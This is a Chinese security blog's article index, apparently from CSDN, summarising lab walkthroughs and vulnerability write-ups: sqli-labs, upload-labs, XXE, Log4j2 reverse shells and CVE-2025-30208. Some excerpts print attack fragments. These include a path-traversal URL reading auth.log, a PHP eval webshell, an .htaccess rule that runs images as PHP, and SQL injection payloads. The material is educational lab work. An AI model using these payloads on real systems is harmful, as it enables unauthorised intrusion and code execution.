自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(38)
  • 收藏
  • 关注

原创 Sapido-多款路由器-远程命令执行漏洞

Sapido多款路由器在未授权的情况下,导致任意访问者可以以Root权限执行命令。

2025-03-30 14:55:22 407

原创 Ollama 未授权访问

Ollama 是一款开源跨平台工具,用于本地化部署和管理大语言模型(如 DeepSeek-R1、Llama、Phi-4 等),支持 macOS、Windows、Linux 及 Docker 容器化运行。(默认监听端口 11434)

2025-03-28 20:11:17 434

原创 Vite任意文件读取漏洞:CVE-2025-30208

Vite是一款现代化的前端开发构建工具,它提供了快速的开发服务器和高效的构建能力,广泛应用于Vue.js项目的开发过程中。由于Vite开发服务器在处理特定URL请求时,没有对请求的路径进行严格的安全检查和限制,导致攻击者可以绕过保护机制,非法访问项目根目录外的敏感文件。攻击者只需在浏览器输入一个URL,就可能会造成源码、SSH密钥、数据库账号、用户数据等目标机器上的任意文件信息泄露。

2025-03-28 19:20:24 552

原创 Vulhub靶机--FAll

这里可以看到ip和部分端口,我们还是扫描一下查看。

2025-03-27 19:56:05 858

原创 NetMizer-日志管理系统-登录绕过漏洞

NetMizer 日志管理系统存在登录绕过漏洞,通过限制某个请求包的发送获取后台权限。

2025-03-25 20:44:02 285

原创 Vulhub靶机-Thales

哥斯拉生成木马文件,压缩为zip文件,将后缀改为war上传。账号密码为:tomcat;role1 登陆成功。

2025-03-25 19:36:19 874

原创 常见框架漏洞--iis

PUT漏洞漏洞描述IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写⼊的权限,造成任意⽂件上传。

2025-03-24 21:03:40 670

原创 常见框架漏洞--shiro

Shiro漏洞原理Apache Shiro是⼀个强⼤易⽤的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易⽤,同时也能提供健壮的安全性。Shiro漏洞原理在Shiro框架下,⽤户登陆成功后会⽣成⼀个经过加密的Cookie。其Cookie的Key的值为 RememberMe,Value的值是经过序列化、AES加密和Base64编码后得到的结果。服务端在接收到⼀个Cookie时,会按照如下步骤进⾏解析处理:检索RememberMe Cookie的值进⾏Base64解码。

2025-03-24 19:55:57 197

原创 常见框架漏洞--Spring

Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)环境搭建。

2025-03-24 19:43:37 426

原创 常见框架漏洞--struts2

漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程代码执⾏漏洞的发⽣。

2025-03-24 19:29:16 437

原创 常⻅框架漏洞--ThinkPHP

Thinkphp5x远程命令执⾏及getshellThinkphp5x远程命令执⾏及getshell环境搭建。

2025-03-24 19:08:58 385

原创 Vulhub--jangow靶机攻略

【代码】Vulhub--jangow靶机攻略。

2025-03-24 18:53:09 381

原创 常见中间件漏洞--Jboss、Apache

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象,然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码执⾏。

2025-03-23 23:44:04 1264

原创 常⻅中间件漏洞--Tomcat

2. 后台弱⼝令部署war包tomcat是⼀个开源⽽且免费的jsp服务器,默认端⼝ : 8080,属于轻量级应⽤服务器。它可以实现JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的⼀款环境。Tomcat put⽅法任意⽂件写⼊漏洞漏洞描述。

2025-03-23 23:00:04 768

原创 常⻅中间件漏洞--WebLogic

WebLogic是美国Oracle公司出品的⼀个application server,确切的说是⼀个基于JAVAEE架构的中间 件,默认端⼝:7001 WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据库应⽤的Java应⽤服务器。将Java的动态功能和Java Enterprise标准的安全性引⼊⼤型⽹络应⽤的开发、集成、部署和管理之中。

2025-03-23 22:58:53 1247

原创 Vulnhub靶机:Web Machine(N7)

将role的位置进行两次URL解码,一次base64解码,一次MD5解密得到admin。将其输入得到flag的后半段。

2025-03-20 20:45:36 591

原创 常⻅CMS漏洞 -DeDeCMS 获取webshell

姿势⼀:通过⽂件管理器上传WebShellDedeCMS是织梦团队开发PHP ⽹站管理系统,它以简单、易⽤、⾼效为特⾊,组建出各种各样各具特⾊的⽹站姿势⼀:通过⽂件管理器上传WebShell。

2025-03-20 19:43:04 546

原创 常⻅CMS漏洞 Vulhub-WordPress获取shell

后台修改模板拿WebShellWordPress是⼀个以PHP和MySQL为平台的⾃由开源的博客软件和内容管理系统。

2025-03-20 18:45:38 479

原创 vulhub Matrix-Breakout

【代码】vulhub Matrix-Breakout。

2025-03-19 17:29:36 506

原创 vulhub-joker靶机

尝试后台getshell:Extensions---templates---templates----beez3。

2025-03-18 20:17:14 517

原创 vulhub靶机Billu_b0x

密码:b0x_billu。数据库名:ica_lab。

2025-03-18 18:41:01 635

原创 Log4j2漏洞实战 --反弹shell

log4j2是Apache的⼀个java⽇志框架,我们借助它进⾏⽇志相关操作管理,然⽽在2021年末log4j2爆出了远程代码执⾏漏洞,属于严重等级的漏洞。

2025-03-16 17:55:32 1059

原创 hackme靶场攻略

SQL注入,文件上传漏洞

2025-03-13 20:08:58 541

原创 文件解析漏洞详解

IIS解析漏洞IIS解析漏洞环境安装IIS6.X⽬录解析在iis6.x中,.asp⽂件夹中的任意⽂件都会被当做asp⽂件去执⾏。在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件在x.asp中新建⼀个png⽂件。内容为<%=now()%> asp代码。外部浏览器中访问windows2003的iis⽹站中的1.png 发现asp代码被执⾏将1.png⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏畸形⽂件解析。

2025-03-13 18:52:57 1090

原创 tomato靶场通关攻略

http://192.168.126.151/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.loghttp://192.168.126.151:2211/<?php @eval($_POST['cmd']);?>运用蚁剑连接木马,连接成功即可

2025-03-12 23:29:38 526

原创 upload-labs 通关攻略

配置环境后打开4.再次上传,上传成功内容为:<FilesMatch "1.png">SetHandler application/x-httpd-php</FilesMatch>如果文件里面有一个后缀为.png的文件,他就会被解析成.php上传一个文件2.Php,新链接打开图片 文件名末尾添加空格,由于windows命名规范不允许文件名末尾出现空格,所有我们上传1.php空格的话,上传成功以后空格会被windows电脑自动删除,只留下1.php。在windows识别文件的时候,会把::$da

2025-03-11 20:39:54 1324

原创 xxe-靶机通关攻略

&xxe;</name><password>1</root><?<root><name>&xxe;

2025-03-10 19:49:57 520

原创 xxe-lab 通关攻略

XML外部实体注⼊

2025-03-10 17:23:50 248

原创 CTF-Hub SSRF通关攻略

CTFHUB-读取⽂件CTFHUB-内⽹访问CTFHUB-读取⽂件伪协议读取⽂件CTFHUB-端⼝扫描根据题⽬提示端⼝号在8000-9000之内,使⽤BP抓包并进⾏爆破添加payload值,设置取值范围。

2025-03-07 15:54:45 1246

原创 metinfo-CSRF漏洞攻略

由于⽹站对⽤户⽹⻚浏览器的信任导致⽤户在当前已登录的Web站点的状态下,访问攻击者构造的攻击连接从⽽执⾏⾮本意的操作的漏洞。

2025-03-06 20:23:37 356

原创 XSS-flash攻击钓鱼

上面的flash.exe是我们要让管理员下载运行的病毒文件,当管理员下载运行后我们就能控制管理员电脑了。

2025-03-05 23:16:09 573

原创 sqli-labs less16-20

剩余三个表依次查询得 referers uagents users。在username和password处尝试注入均被转义,无法注入。利用Burp Suite抓包 抓到数据发送打Repeater。利用Burp Suite抓包 抓到数据发送打Repeater。bp抓包发送到repeater 方便操作。在user-agent后测试发现。该图表名该关卡为cookie注入。1' and ' 页面正常。1' and ' 页面正常。运用bp进行之后步骤。依次查询剩余数据即可。是referer注入。

2025-03-04 21:29:20 675

原创 sqli-labs通关攻略less13-15

通过BP爆破我们可以得出表名是:emails,referers,uagents,users。通过BP爆破我们得出user表有三个字段,分别为id,username,password。只有正确错误,为布尔盲注,用burpsuite进行抓包处理。bp抓包在之前文章less8有详细记录,有需要可以返回查看。通过BP爆破我们就可以得到我们要的数据。

2025-03-03 23:12:13 444

原创 AI-web 1.0 通关攻略

连接成功。

2025-03-03 19:43:14 542

原创 sqli-labs通关攻略less9-12

使用 Burp 工具开启拦截,并注入,发送都重放器,发送并观察时间。id=1' and sleep(5)--+ #快速执行。id=1" and sleep(5)--+ #休眠5秒。id=1 and sleep(5)--+ #快速执行。1' order by 2# //无报错信息。1' order by 3# //有报错信息。剩余操作流程如less-11,继续查询即可。1 or 1=1# //无回显信息。依据以上操作,判断出所有表名。1")# //有回显信息。1'# //无回显信息。1"# //有报错信息。

2025-03-02 20:23:14 671

原创 sqli-labs通关攻略less5-8

还是在concat的第二个参数的位置查询我们想要的东西,查询是select,既然select不是在句首,而是在句中查询,就要用到子查询,子查询就是放到括号里面去写。id=1 and 1=2--+(把数字型逻辑判断改成错的,页面仍然正常,说明不是数字型的注入)id=1 and 1=2--+(把数字型逻辑判断改成错的,页面仍然正常,说明不是数字型的注入)id=1 and 1=2--+(把数字型逻辑判断改成错的,页面仍然正常,说明不是数字型的注入)' " ') ')) ")依次尝试。

2025-02-27 21:28:49 705

原创 sqli-labs通关攻略less1-4

sqli-labs通关攻略

2025-02-26 23:33:55 367

原创 CTFHuB技能树web-信息泄露篇通关攻略

CTFHuB技能树web-信息泄露篇通关攻略

2025-02-25 22:45:22 337

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除